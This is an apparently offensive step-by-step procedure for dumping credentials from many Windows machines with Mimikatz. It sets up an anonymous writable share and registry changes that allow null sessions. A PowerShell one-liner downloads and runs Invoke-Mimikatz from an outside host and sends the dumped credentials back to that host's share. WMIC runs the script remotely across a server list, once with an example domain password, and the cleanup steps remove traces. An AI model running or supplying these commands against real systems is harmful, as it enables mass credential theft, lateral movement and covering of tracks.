- Make Share:
cd\
mkdir open
net share open=C:\open /grant:everyone,full
icacls C:\open\ /grant Everyone:(OI)(CI)F /t
- Set registry keys (massmimi_reg.rb meterpreter script):
reg change HKLM\System\CurrentControlSet\services\LanmanServer\Parameters NullSessionShares REG_MULTI_SZ open
reg change HKLM\System\CurrentControlSet\Control\Lsa "EveryoneIncludesAnonymous" 1
-
Change directory into new "open" directory
-
Upload powershell script (powermeup.cmd):
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1
-
Upload clymb3r's Invoke-Mimikatz ps1 - Download from PowerSploit repo: source on github
-
Upload mongoose: Downloads Page - Both regular and tiny versions work
-
Upload serverlist.txt - This is a line by line list of computer names to use mimikatz on.
-
Execute mongoose (from directory with mimikatz.ps1) - This will start a listener with directory listings enabled on port 8080 by default
-
Execute wmic:
wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"
9a. Execute wmic with creds:
wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"
- kill mongoose process
- net share open /delete
- kill registry values
- delete "open" directory